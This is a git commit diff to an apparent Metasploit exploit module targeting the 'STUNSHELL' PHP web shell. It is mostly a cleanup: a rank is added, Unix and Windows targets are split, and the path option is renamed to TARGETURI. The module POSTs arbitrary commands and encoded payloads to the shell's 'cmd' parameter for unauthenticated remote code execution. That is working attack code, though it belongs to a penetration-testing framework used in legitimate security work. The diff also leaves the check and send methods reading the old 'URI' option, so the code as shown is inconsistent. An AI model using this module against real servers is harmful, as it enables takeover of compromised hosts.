Moved module and cleaned code

bwall · bwall · commit cc92b54e8314 · 2013-03-27T17:03:18.000-04:00
diff --git a/modules/exploits/multi/http/stunshell_exec.rb b/modules/exploits/multi/http/stunshell_exec.rb
@@ -8,14 +8,15 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info={})
 		super(update_info(info,
-			'Name'           => '"STUNSHELL" Web Shell Remote Code Execution',
+			'Name'           => 'STUNSHELL Web Shell Remote Code Execution',
 			'Description'    => %q{
-				This module exploits unauthenticated versions of the "STUNSHELL" web shell.  This
+					This module exploits unauthenticated versions of the "STUNSHELL" web shell.  This
 				module works when safe mode is disabled on the web server.  This shell is widely
 				used in automated RFI payloads.
 			},
@@ -32,32 +33,36 @@ module works when safe mode is disabled on the web server.  This shell is widely
 			'Privileged'     => false,
 			'Payload'        =>
 				{
-					'Space'    => 10000, # Need to test this
+					'Space'    => 10000, # Value determined by web server's POST limits
 					'BadChars' => '',
 					'DisableNops' => true,
 					'Compat'      =>
 						{
-							'PayloadType' => 'cmd',
+							'PayloadType' => 'cmd'
 						}
 				},
 			'Platform'       => ['unix', 'win'],
 			'Arch'           => ARCH_CMD,
-			'Targets'        => [['Automatic',{}]],
+			'Targets'        => 
+				[
+					['stunshell / Unix', { 'Platform' => 'unix' } ],
+					['stunshell / Windows', { 'Platform' => 'win' } ]
+				],
 			'DisclosureDate' => 'Mar 23 2013',
 			'DefaultTarget'  => 0))
 
 		register_options(
 			[
-				OptString.new('URI',[true, "The path to the andalas_oku shell", "/"]),
+				OptString.new('TARGETURI',[true, "The path to the andalas_oku shell", "/IDC.php"]),
 			],self.class)
 	end
 
 	def check
 		uri = normalize_uri(datastore['URI'])
 		request_parameters = {
-			'method'    => 'POST',
-			'uri'       => uri,
-			'vars_post' =>
+			'method'	=> 'POST',
+			'uri'		=> uri,
+			'vars_post'	=>
 				{
 					'cmd' => "echo 'andalas_oku test parameter'"
 				}
@@ -69,12 +74,12 @@ def check
 		return Exploit::CheckCode::Safe
 	end
 
-	def http_send_command(cmd, opts = {})
+	def http_send_command(cmd)
 		uri = normalize_uri(datastore['URI'])
 		request_parameters = {
-			'method'    => 'POST',
-			'uri'       => uri,
-			'vars_post' =>
+			'method'	=> 'POST',
+			'uri'		=> uri,
+			'vars_post'	=>
 				{
 					'cmd' => cmd
 				}
@@ -85,10 +90,6 @@ def http_send_command(cmd, opts = {})
 		end
 	end
 
-	def execute_command(cmd, opts = {})
-		http_send_command("#{cmd}")
-	end
-
 	def exploit
 		http_send_command(payload.encoded)
 	end
